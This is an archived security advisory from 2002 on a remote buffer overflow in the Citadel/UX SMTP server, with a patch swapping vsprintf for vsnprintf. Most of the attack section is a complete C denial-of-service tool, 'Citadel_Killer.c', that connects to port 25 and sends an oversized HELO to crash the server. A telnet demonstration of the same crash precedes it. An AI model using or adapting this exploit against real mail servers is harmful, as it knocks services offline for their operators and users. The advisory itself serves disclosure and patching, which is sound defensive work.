Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Linux :: Apps A-M :: lnx5181.htm

Citadel/UX - remote buffer overflow leads to DoS



12th Mar 2002 [SBWID-5181]
COMMAND

	Citadel remote buffer overflow leads to DoS

SYSTEMS AFFECTED

	Citadel v5.90??

PROBLEM

	xperc posted :
	

	An attacker can execute a denial  of  service  attack  against  Citadel.
	Once the big buffer has been sent, the server is vulnerable.
	

	Example:
	

	[xperc@security citadel]$telnet 192.168.0.3 25

	Trying 192.168.0.3...

	Connected to 192.168.0.3.

	Escape character is \'^]\'.

	220 security ESMTP Citadel/UX server ready.

	helo [buffer]

	

	[buffer] is around 4096 characters.
	

	

	/* Citadel_Killer.c

	 *

	 * Remote Denial of Service Citadel/UX Server.  

	 * 

	 *		by xperc@hotmail.com

	 */

	#include <stdio.h>

	#include <sys/socket.h>

	#include <netinet/in.h>

	

	#define MAXBUF 		8000 

	#define MAXBUF2		MAXBUF+6

	#define RECVBUF		256

	#define CIT_SMTP	25	

	

	int main(int argc, char *argv[])

	{

		int sockfd;

		char msg[RECVBUF],buf[MAXBUF],sendbuf

	[MAXBUF2];

		struct sockaddr_in target;

	

		if(argc!=2){

			fprintf(stderr,\"Usage: %s 

	target_address\\n\",*argv);

			exit(-1);

		}

		if((sockfd=socket

	(AF_INET,SOCK_STREAM,0))<0){

			perror(\"socket\");

			exit(-1);

		}

		target.sin_family=AF_INET;

		target.sin_port=htons(CIT_SMTP);

		target.sin_addr.s_addr=inet_addr(argv[1]);

		if(connect(sockfd,(struct sockaddr*)

	&target,sizeof(target))<0){

			perror(\"connect\");

			exit(-1);	

		}

		if(recv(sockfd,msg,sizeof(msg)-1,0)<=0){

			perror(\"recv\");

			exit(-1);

		}

	

		memset(buf,\'a\',MAXBUF);

		snprintf(sendbuf,sizeof(sendbuf),\"helo %

	s\",buf);

		strcat(sendbuf,\"\\n\");

	

		send(sockfd,sendbuf,strlen(sendbuf),0);

		close(sockfd);

	

		return 0;

	}

	

	

SOLUTION

	Patch for this Vulnerability:
	

	--- citadel-old/sysdep.c	Sat Dec  8 12:31:44 

	2001

	+++ citadel/sysdep.c	Sat Mar  9 05:51:11 

	2002

	@@ -106,7 +106,7 @@

	 	char buf[4096];

	   

	         va_start(arg_ptr, format);   

	-        vsprintf(buf, format, arg_ptr);   

	+        vsnprintf(buf, sizeof(buf), format, arg_ptr);   

	         va_end(arg_ptr);   

	 

	 	if (loglevel <= verbosity) { 

	

	


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH